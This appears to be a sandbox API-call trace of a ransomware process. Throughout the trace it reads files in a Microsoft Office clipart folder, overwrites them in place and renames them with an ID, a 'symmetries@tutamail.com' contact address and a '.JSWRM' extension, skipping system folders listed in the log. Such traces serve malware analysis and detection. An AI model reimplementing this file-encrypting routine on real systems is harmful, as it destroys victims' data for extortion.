12 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01849_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01849_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.278] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=624) returned 1 [0092.278] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0092.278] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0092.279] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.279] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0092.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0092.280] CloseHandle (hObject=0x314) returned 1 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0092.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0092.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0092.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0092.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0092.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.282] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01852_.WMF", cAlternateFileName="")) returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2=".") returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="..") returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="...") returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="windows") returned -1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="recovery") returned -1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="perflogs") returned -1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="documents and settings") returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.282] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="system volume information") returned -1 [0092.283] lstrcmpiW (lpString1="NA01852_.WMF", lpString2="msocache") returned 1 [0092.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01852_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01852_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01852_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0092.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01852_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01852_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01852_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.283] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4408) returned 1 [0092.283] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1130) returned 0x205850 [0092.283] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1130, lpOverlapped=0x0) returned 1 [0092.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.285] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1130, lpOverlapped=0x0) returned 1 [0092.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.285] CloseHandle (hObject=0x314) returned 1 [0092.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0092.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0092.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.287] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01858_.WMF", cAlternateFileName="")) returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2=".") returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="..") returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="...") returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="windows") returned -1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="recovery") returned -1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="perflogs") returned -1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="documents and settings") returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="system volume information") returned -1 [0092.287] lstrcmpiW (lpString1="NA01858_.WMF", lpString2="msocache") returned 1 [0092.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01858_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01858_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01858_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01858_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01858_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01858_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.288] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4296) returned 1 [0092.288] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10c0) returned 0x205850 [0092.288] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x10c0, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.290] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x10c0, lpOverlapped=0x0) returned 1 [0092.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.290] CloseHandle (hObject=0x314) returned 1 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0092.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.291] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01866_.WMF", cAlternateFileName="")) returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2=".") returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="..") returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="...") returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="windows") returned -1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="recovery") returned -1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="perflogs") returned -1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="documents and settings") returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="system volume information") returned -1 [0092.291] lstrcmpiW (lpString1="NA01866_.WMF", lpString2="msocache") returned 1 [0092.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01866_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01866_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01866_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01866_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01866_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01866_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.292] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3512) returned 1 [0092.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdb0) returned 0x23fc98 [0092.292] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xdb0, 